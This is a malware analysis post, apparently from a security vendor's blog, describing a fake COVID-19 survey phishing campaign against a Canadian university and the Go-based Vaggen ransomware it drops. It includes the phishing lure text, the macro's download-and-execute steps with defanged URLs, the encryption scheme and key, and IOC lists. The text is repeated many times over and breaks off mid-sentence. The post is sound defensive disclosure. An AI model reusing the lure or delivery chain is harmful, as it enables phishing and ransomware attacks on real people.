Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1953 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1954 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1955 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1956 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1957 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.
https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without generating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection: the .docx itself carries no macro, only a relationship pointing at a remote template (template.dotm) that Word fetches when the document is opened, and it is that template that is weaponized with a malicious macro. The template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe (polisen.exe is downloaded but not launched by the macro itself)
Checks the return value of Shell to see whether the launch succeeded (on success it is the task ID of the started application)
If successful, sends an HTTP GET request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, sends an HTTP GET request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will therefore trigger a notification via the canarytokens.com website. People typically use this type of service to get alerted when a particular event occurs; it can be very useful as an early warning that an intruder has gained access to a network.
For the attacker, the canary token most likely serves as a read receipt: how many people opened the document, and perhaps where they are located.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, whose entry point is the function main_main.

Other functions belonging to the main package have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Their roles, as recovered during analysis:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (for example the content of the ransom note) are encrypted with XXTEA, using the xxtea-go library. Each encrypted chunk is first decoded from Base64 and then decrypted with the hardcoded XXTEA key “STALKER”. At the end of execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware is Swedish for “you take my heart my money”. Because the key is embedded in the binary and the nonce and authentication tag are stored in the file itself, nothing held by the attacker is needed to decrypt the content; the GCM tag even lets a decryptor verify that each file was recovered intact.

With all these elements, we can recover encrypted files without paying the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with the nice touch of adding canary tokens. It is unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that use a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1991 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1992 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1993 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1994 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1995 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1996 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1997 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1998 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1999 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2000 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2001 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2002 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2003 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2004 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2005 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2006 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2007 of 3467\n\nSome of 